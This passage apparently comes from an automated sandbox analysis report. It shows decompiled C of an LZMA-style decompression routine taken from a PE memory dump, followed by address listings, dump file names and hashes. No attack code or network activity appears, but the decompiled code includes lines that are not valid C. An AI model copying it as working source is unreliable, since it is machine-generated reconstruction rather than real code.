                                            												 *(__ebp - 0x40) = __ecx;
                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            												goto L108;
                                            											case 0x1a:
                                            												L56:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													 *(__ebp - 0x88) = 0x1a;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x68);
                                            												__al =  *(__ebp - 0x5c);
                                            												__edx =  *(__ebp - 8);
                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *( *(__ebp - 0x68)) = __al;
                                            												__ecx =  *(__ebp - 0x14);
                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                            												__eax = __ecx + 1;
                                            												__edx = 0;
                                            												_t192 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t192;
                                            												goto L80;
                                            											case 0x1b:
                                            												L76:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													 *(__ebp - 0x88) = 0x1b;
                                            													goto L170;
                                            												}
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t275 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t275;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												_t284 = __ebp - 0x64;
                                            												 *_t284 =  *(__ebp - 0x64) - 1;
                                            												__eflags =  *_t284;
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												L80:
                                            												 *(__ebp - 0x14) = __edx;
                                            												goto L81;
                                            											case 0x1c:
                                            												while(1) {
                                            													L123:
                                            													__eflags =  *(__ebp - 0x64);
                                            													if( *(__ebp - 0x64) == 0) {
                                            														break;
                                            													}
                                            													__eax =  *(__ebp - 0x14);
                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            													__eflags = __eax -  *(__ebp - 0x74);
                                            													if(__eax >=  *(__ebp - 0x74)) {
                                            														__eax = __eax +  *(__ebp - 0x74);
                                            														__eflags = __eax;
                                            													}
                                            													__edx =  *(__ebp - 8);
                                            													__cl =  *(__eax + __edx);
                                            													__eax =  *(__ebp - 0x14);
                                            													 *(__ebp - 0x5c) = __cl;
                                            													 *(__eax + __edx) = __cl;
                                            													__eax = __eax + 1;
                                            													__edx = 0;
                                            													_t414 = __eax %  *(__ebp - 0x74);
                                            													__eax = __eax /  *(__ebp - 0x74);
                                            													__edx = _t414;
                                            													__eax =  *(__ebp - 0x68);
                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                            													__eflags =  *(__ebp - 0x30);
                                            													 *( *(__ebp - 0x68)) = __cl;
                                            													 *(__ebp - 0x14) = _t414;
                                            													if( *(__ebp - 0x30) > 0) {
                                            														continue;
                                            													} else {
                                            														L81:
                                            														 *(__ebp - 0x88) = 2;
                                            														goto L1;
                                            													}
                                            												}
                                            												 *(__ebp - 0x88) = 0x1c;
                                            												goto L170;
                                            										}
                                            									}
                                            									L171:
                                            									_t535 = _t534 | 0xffffffff;
                                            									goto L172;
                                            								}
                                            							}
                                            						}
                                            					}
                                            					goto L1;
                                            				}
                                            			}













                                            0x0040633a
                                            0x0040633d
                                            0x00406343
                                            0x00406345
                                            0x00406345
                                            0x00406345
                                            0x00406348
                                            0x0040634b
                                            0x0040634b
                                            0x0040634b
                                            0x00406351
                                            0x00000000
                                            0x00000000
                                            0x00406353
                                            0x00406356
                                            0x00406359
                                            0x0040635c
                                            0x0040635f
                                            0x00406362
                                            0x00406365
                                            0x00406368
                                            0x0040636b
                                            0x0040636e
                                            0x00406371
                                            0x00406389
                                            0x0040638c
                                            0x0040638f
                                            0x00406392
                                            0x00406392
                                            0x00406395
                                            0x00406399
                                            0x0040639b
                                            0x00406373
                                            0x00406373
                                            0x0040637b
                                            0x00406380
                                            0x00406382
                                            0x00406384
                                            0x00406384
                                            0x0040639e
                                            0x004063a5
                                            0x004063a8
                                            0x00000000
                                            0x004063aa
                                            0x00000000
                                            0x004063aa
                                            0x004063a8
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x004063af
                                            0x00000000
                                            0x00000000
                                            0x004063ea
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x0040640f
                                            0x0040640f
                                            0x00406415
                                            0x004063b3
                                            0x004063b3
                                            0x004063b6
                                            0x00000000
                                            0x004063b6
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406432
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645d
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406462
                                            0x00406469
                                            0x0040646c
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x0040646e
                                            0x00000000
                                            0x004066fb
                                            0x004066fb
                                            0x004066ff
                                            0x00406a26
                                            0x00000000
                                            0x00406a26
                                            0x00406705
                                            0x00406708
                                            0x0040670b
                                            0x0040670f
                                            0x00406712
                                            0x00406718
                                            0x0040671a
                                            0x0040671a
                                            0x0040671a
                                            0x0040671d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040680a
                                            0x0040680e
                                            0x00406830
                                            0x00406833
                                            0x0040683d
                                            0x00406840
                                            0x00406840
                                            0x00406840
                                            0x00000000
                                            0x00406840
                                            0x00406840
                                            0x00406810
                                            0x00406813
                                            0x00406817
                                            0x0040681a
                                            0x0040681a
                                            0x0040681d
                                            0x00000000
                                            0x00000000
                                            0x004068c7
                                            0x004068cb
                                            0x004068e9
                                            0x004068e9
                                            0x004068e9
                                            0x004068f0
                                            0x004068f7
                                            0x004068fe
                                            0x004068fe
                                            0x00000000
                                            0x004068fe
                                            0x004068cd
                                            0x004068d0
                                            0x004068d3
                                            0x004068d6
                                            0x004068dd
                                            0x00406821
                                            0x00406821
                                            0x00406824
                                            0x00000000
                                            0x00000000
                                            0x004069b8
                                            0x004069bb
                                            0x004068bc
                                            0x00000000
                                            0x00000000
                                            0x004065f2
                                            0x004065f4
                                            0x004065fb
                                            0x004065fc
                                            0x004065fe
                                            0x00406601
                                            0x00000000
                                            0x00000000
                                            0x00406609
                                            0x0040660c
                                            0x0040660f
                                            0x00406611
                                            0x00406613
                                            0x00406613
                                            0x00406614
                                            0x00406617
                                            0x0040661e
                                            0x00406621
                                            0x0040662f
                                            0x00000000
                                            0x00000000
                                            0x00406905
                                            0x00406905
                                            0x00406908
                                            0x0040690f
                                            0x00000000
                                            0x00000000
                                            0x00406914
                                            0x00406914
                                            0x00406918
                                            0x00406a50
                                            0x00000000
                                            0x00406a50
                                            0x0040691e
                                            0x00406921
                                            0x00406924
                                            0x00406928
                                            0x0040692b
                                            0x00406931
                                            0x00406933
                                            0x00406933
                                            0x00406933
                                            0x00406936
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x00406939
                                            0x0040693c
                                            0x0040693c
                                            0x00406940
                                            0x004069a0
                                            0x004069a3
                                            0x004069a8
                                            0x004069a9
                                            0x004069ab
                                            0x004069ad
                                            0x004069b0
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x004068c2
                                            0x004068bc
                                            0x00406942
                                            0x00406948
                                            0x0040694b
                                            0x0040694e
                                            0x00406951
                                            0x00406954
                                            0x00406957
                                            0x0040695a
                                            0x0040695d
                                            0x00406960
                                            0x00406963
                                            0x0040697c
                                            0x0040697f
                                            0x00406982
                                            0x00406985
                                            0x00406989
                                            0x0040698b
                                            0x0040698b
                                            0x0040698c
                                            0x0040698f
                                            0x00406965
                                            0x00406965
                                            0x0040696d
                                            0x00406972
                                            0x00406974
                                            0x00406977
                                            0x00406977
                                            0x00406992
                                            0x00406999
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x0040699b
                                            0x00000000
                                            0x00406637
                                            0x0040663a
                                            0x00406670
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a0
                                            0x004067a3
                                            0x004067a3
                                            0x004067a6
                                            0x004067a8
                                            0x00406a32
                                            0x00000000
                                            0x00406a32
                                            0x004067ae
                                            0x004067b1
                                            0x00000000
                                            0x00000000
                                            0x004067b7
                                            0x004067bb
                                            0x004067be
                                            0x004067be
                                            0x004067be
                                            0x00000000
                                            0x004067be
                                            0x0040663c
                                            0x0040663e
                                            0x00406640
                                            0x00406642
                                            0x00406645
                                            0x00406646
                                            0x00406648
                                            0x0040664a
                                            0x0040664d
                                            0x00406650
                                            0x00406666
                                            0x0040666b
                                            0x004066a3
                                            0x004066a3
                                            0x004066a7
                                            0x004066d3
                                            0x004066d5
                                            0x004066dc
                                            0x004066df
                                            0x004066e2
                                            0x004066e2
                                            0x004066e7
                                            0x004066e7
                                            0x004066e9
                                            0x004066ec
                                            0x004066f3
                                            0x004066f6
                                            0x00406723
                                            0x00406723
                                            0x00406726
                                            0x00406729
                                            0x0040679d
                                            0x0040679d
                                            0x0040679d
                                            0x00000000
                                            0x0040679d
                                            0x0040672b
                                            0x00406731
                                            0x00406734
                                            0x00406737
                                            0x0040673a
                                            0x0040673d
                                            0x00406740
                                            0x00406743
                                            0x00406746
                                            0x00406749
                                            0x0040674c
                                            0x00406765
                                            0x00406767
                                            0x0040676a
                                            0x0040676b
                                            0x0040676e
                                            0x00406770
                                            0x00406773
                                            0x00406775
                                            0x00406777
                                            0x0040677a
                                            0x0040677c
                                            0x0040677f
                                            0x00406783
                                            0x00406785
                                            0x00406785
                                            0x00406786
                                            0x00406789
                                            0x0040678c
                                            0x0040674e
                                            0x0040674e
                                            0x00406756
                                            0x0040675b
                                            0x0040675d
                                            0x00406760
                                            0x00406760
                                            0x0040678f
                                            0x00406796
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00406720
                                            0x00000000
                                            0x00406798
                                            0x00000000
                                            0x00406798
                                            0x00406796
                                            0x004066a9
                                            0x004066ac
                                            0x004066ae
                                            0x004066b1
                                            0x004066b4
                                            0x004066b7
                                            0x004066b9
                                            0x004066bc
                                            0x004066bf
                                            0x004066bf
                                            0x004066c2
                                            0x004066c2
                                            0x004066c5
                                            0x004066cc
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x004066a0
                                            0x00000000
                                            0x004066ce
                                            0x00000000
                                            0x004066ce
                                            0x004066cc
                                            0x00406652
                                            0x00406655
                                            0x00406657
                                            0x0040665a
                                            0x00000000
                                            0x00000000
                                            0x004063b9
                                            0x004063b9
                                            0x004063bd
                                            0x00406a02
                                            0x00000000
                                            0x00406a02
                                            0x004063c3
                                            0x004063c6
                                            0x004063c9
                                            0x004063cc
                                            0x004063cf
                                            0x004063d2
                                            0x004063d5
                                            0x004063d7
                                            0x004063da
                                            0x004063dd
                                            0x004063e0
                                            0x004063e2
                                            0x004063e2
                                            0x004063e2
                                            0x00000000
                                            0x00000000
                                            0x00406544
                                            0x00406544
                                            0x00406548
                                            0x00406a0e
                                            0x00000000
                                            0x00406a0e
                                            0x0040654e
                                            0x00406551
                                            0x00406554
                                            0x00406557
                                            0x00406559
                                            0x00406559
                                            0x00406559
                                            0x0040655c
                                            0x0040655f
                                            0x00406562
                                            0x00406565
                                            0x00406568
                                            0x0040656b
                                            0x0040656c
                                            0x0040656e
                                            0x0040656e
                                            0x0040656e
                                            0x00406571
                                            0x00406574
                                            0x00406577
                                            0x0040657a
                                            0x0040657a
                                            0x0040657a
                                            0x0040657d
                                            0x0040657f
                                            0x0040657f
                                            0x00000000
                                            0x00000000
                                            0x004067c1
                                            0x004067c1
                                            0x004067c1
                                            0x004067c5
                                            0x00000000
                                            0x00000000
                                            0x004067cb
                                            0x004067ce
                                            0x004067d1
                                            0x004067d4
                                            0x004067d6
                                            0x004067d6
                                            0x004067d6
                                            0x004067d9
                                            0x004067dc
                                            0x004067df
                                            0x004067e2
                                            0x004067e5
                                            0x004067e8
                                            0x004067e9
                                            0x004067eb
                                            0x004067eb
                                            0x004067eb
                                            0x004067ee
                                            0x004067f1
                                            0x004067f4
                                            0x004067f7
                                            0x004067fa
                                            0x004067fe
                                            0x00406800
                                            0x00406803
                                            0x00000000
                                            0x00406805
                                            0x00406582
                                            0x00406582
                                            0x00000000
                                            0x00406582
                                            0x00406803
                                            0x00406a38
                                            0x00000000
                                            0x00000000
                                            0x00406067
                                            0x00406a6f
                                            0x00406a6f
                                            0x00000000
                                            0x00406a6f
                                            0x004068bc
                                            0x00406843
                                            0x00406840
                                            0x00000000
                                            0x00406595

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                            • Instruction ID: c4674237f5282a099a09cde02a4657600336f9fef0cdfe8d994bfdecfa790225
                                            • Opcode Fuzzy Hash: 61519280ecd7fef69977b9b053ed39a1e65b41a016af8b99da7ecabe5fea5e13
                                            • Instruction Fuzzy Hash: 4A714671E00228CFDF28DFA8C8547ADBBB1FB44301F15816AD916BB281C7785A96DF44
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 98%
                                            			E004064DD() {
                                            				unsigned short _t531;
                                            				signed int _t532;
                                            				void _t533;
                                            				signed int _t534;
                                            				signed int _t535;
                                            				signed int _t565;
                                            				signed int _t568;
                                            				signed int _t589;
                                            				signed int* _t606;
                                            				void* _t613;
                                            
                                            				L0:
                                            				while(1) {
                                            					L0:
                                            					if( *(_t613 - 0x40) != 0) {
                                            						 *(_t613 - 0x84) = 0xa;
                                            						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                            					} else {
                                            						 *(__ebp - 0x84) = 9;
                                            						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            					}
                                            					while(1) {
                                            						 *(_t613 - 0x54) = _t606;
                                            						while(1) {
                                            							L133:
                                            							_t531 =  *_t606;
                                            							_t589 = _t531 & 0x0000ffff;
                                            							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            							if( *(_t613 - 0xc) >= _t565) {
                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            								 *(_t613 - 0x40) = 1;
                                            								_t532 = _t531 - (_t531 >> 5);
                                            								 *_t606 = _t532;
                                            							} else {
                                            								 *(_t613 - 0x10) = _t565;
                                            								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                            							}
                                            							if( *(_t613 - 0x10) >= 0x1000000) {
                                            								goto L139;
                                            							}
                                            							L137:
                                            							if( *(_t613 - 0x6c) == 0) {
                                            								 *(_t613 - 0x88) = 5;
                                            								L170:
                                            								_t568 = 0x22;
                                            								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                            								_t535 = 0;
                                            								L172:
                                            								return _t535;
                                            							}
                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            							L139:
                                            							_t533 =  *(_t613 - 0x84);
                                            							while(1) {
                                            								 *(_t613 - 0x88) = _t533;
                                            								while(1) {
                                            									L1:
                                            									_t534 =  *(_t613 - 0x88);
                                            									if(_t534 > 0x1c) {
                                            										break;
                                            									}
                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
                                            										case 0:
                                            											if( *(_t613 - 0x6c) == 0) {
                                            												goto L170;
                                            											}
                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            											_t534 =  *( *(_t613 - 0x70));
                                            											if(_t534 > 0xe1) {
                                            												goto L171;
                                            											}
                                            											_t538 = _t534 & 0x000000ff;
                                            											_push(0x2d);
                                            											asm("cdq");
                                            											_pop(_t570);
                                            											_push(9);
                                            											_pop(_t571);
                                            											_t609 = _t538 / _t570;
                                            											_t540 = _t538 % _t570 & 0x000000ff;
                                            											asm("cdq");
                                            											_t604 = _t540 % _t571 & 0x000000ff;
                                            											 *(_t613 - 0x3c) = _t604;
                                            											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                            											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                            											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                            											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                            												L10:
                                            												if(_t612 == 0) {
                                            													L12:
                                            													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            													goto L15;
                                            												} else {
                                            													goto L11;
                                            												}
                                            												do {
                                            													L11:
                                            													_t612 = _t612 - 1;
                                            													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                            												} while (_t612 != 0);
                                            												goto L12;
                                            											}
                                            											if( *(_t613 - 4) != 0) {
                                            												GlobalFree( *(_t613 - 4));
                                            											}
                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                            											 *(_t613 - 4) = _t534;
                                            											if(_t534 == 0) {
                                            												goto L171;
                                            											} else {
                                            												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                            												goto L10;
                                            											}
                                            										case 1:
                                            											L13:
                                            											__eflags =  *(_t613 - 0x6c);
                                            											if( *(_t613 - 0x6c) == 0) {
                                            												 *(_t613 - 0x88) = 1;
                                            												goto L170;
                                            											}
                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                            											_t45 = _t613 - 0x48;
                                            											 *_t45 =  *(_t613 - 0x48) + 1;
                                            											__eflags =  *_t45;
                                            											L15:
                                            											if( *(_t613 - 0x48) < 4) {
                                            												goto L13;
                                            											}
                                            											_t546 =  *(_t613 - 0x40);
                                            											if(_t546 ==  *(_t613 - 0x74)) {
                                            												L20:
                                            												 *(_t613 - 0x48) = 5;
                                            												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                            												goto L23;
                                            											}
                                            											 *(_t613 - 0x74) = _t546;
                                            											if( *(_t613 - 8) != 0) {
                                            												GlobalFree( *(_t613 - 8)); // executed
                                            											}
                                            											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                            											 *(_t613 - 8) = _t534;
                                            											if(_t534 == 0) {
                                            												goto L171;
                                            											} else {
                                            												goto L20;
                                            											}
                                            										case 2:
                                            											L24:
                                            											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                            											 *(_t613 - 0x84) = 6;
                                            											 *(_t613 - 0x4c) = _t553;
                                            											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                            											 *(_t613 - 0x54) = _t606;
                                            											goto L133;
                                            										case 3:
                                            											L21:
                                            											__eflags =  *(_t613 - 0x6c);
                                            											if( *(_t613 - 0x6c) == 0) {
                                            												 *(_t613 - 0x88) = 3;
                                            												goto L170;
                                            											}
                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                            											_t67 = _t613 - 0x70;
                                            											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                            											__eflags =  *_t67;
                                            											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                            											L23:
                                            											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                            											if( *(_t613 - 0x48) != 0) {
                                            												goto L21;
                                            											}
                                            											goto L24;
                                            										case 4:
                                            											L133:
                                            											_t531 =  *_t606;
                                            											_t589 = _t531 & 0x0000ffff;
                                            											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                            											if( *(_t613 - 0xc) >= _t565) {
                                            												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                            												 *(_t613 - 0x40) = 1;
                                            												_t532 = _t531 - (_t531 >> 5);
                                            												 *_t606 = _t532;
                                            											} else {
                                            												 *(_t613 - 0x10) = _t565;
                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                            												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                            											}
                                            											if( *(_t613 - 0x10) >= 0x1000000) {
                                            												goto L139;
                                            											}
                                            										case 5:
                                            											goto L137;
                                            										case 6:
                                            											__edx = 0;
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x34) = 1;
                                            												 *(__ebp - 0x84) = 7;
                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                            												while(1) {
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											}
                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                            											__esi =  *(__ebp - 0x60);
                                            											__cl = 8;
                                            											__cl = 8 -  *(__ebp - 0x3c);
                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                            											__ecx =  *(__ebp - 0x3c);
                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                            											__ecx =  *(__ebp - 4);
                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            											__eflags =  *(__ebp - 0x38) - 4;
                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            											if( *(__ebp - 0x38) >= 4) {
                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                            												if( *(__ebp - 0x38) >= 0xa) {
                                            													_t98 = __ebp - 0x38;
                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                            													__eflags =  *_t98;
                                            												} else {
                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            												}
                                            											} else {
                                            												 *(__ebp - 0x38) = 0;
                                            											}
                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                            											if( *(__ebp - 0x34) == __edx) {
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												goto L61;
                                            											} else {
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__ecx =  *(__ebp - 8);
                                            												__ebx = 0;
                                            												__ebx = 1;
                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            												goto L41;
                                            											}
                                            										case 7:
                                            											__eflags =  *(__ebp - 0x40) - 1;
                                            											if( *(__ebp - 0x40) != 1) {
                                            												__eax =  *(__ebp - 0x24);
                                            												 *(__ebp - 0x80) = 0x16;
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												__eax =  *(__ebp - 0x2c);
                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            												__eax =  *(__ebp - 4);
                                            												__eax =  *(__ebp - 4) + 0x664;
                                            												__eflags = __eax;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L69;
                                            											}
                                            											__eax =  *(__ebp - 4);
                                            											__ecx =  *(__ebp - 0x38);
                                            											 *(__ebp - 0x84) = 8;
                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            											while(1) {
                                            												 *(_t613 - 0x54) = _t606;
                                            												goto L133;
                                            											}
                                            										case 8:
                                            											goto L0;
                                            										case 9:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												goto L89;
                                            											}
                                            											__eflags =  *(__ebp - 0x60);
                                            											if( *(__ebp - 0x60) == 0) {
                                            												goto L171;
                                            											}
                                            											__eax = 0;
                                            											__eflags =  *(__ebp - 0x38) - 7;
                                            											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                            											__eflags = _t258;
                                            											0 | _t258 = _t258 + _t258 + 9;
                                            											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                            											goto L75;
                                            										case 0xa:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 0xb;
                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                            												while(1) {
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											}
                                            											__eax =  *(__ebp - 0x28);
                                            											goto L88;
                                            										case 0xb:
                                            											__eflags =  *(__ebp - 0x40);
                                            											if( *(__ebp - 0x40) != 0) {
                                            												__ecx =  *(__ebp - 0x24);
                                            												__eax =  *(__ebp - 0x20);
                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            											} else {
                                            												__eax =  *(__ebp - 0x24);
                                            											}
                                            											__ecx =  *(__ebp - 0x28);
                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            											L88:
                                            											__ecx =  *(__ebp - 0x2c);
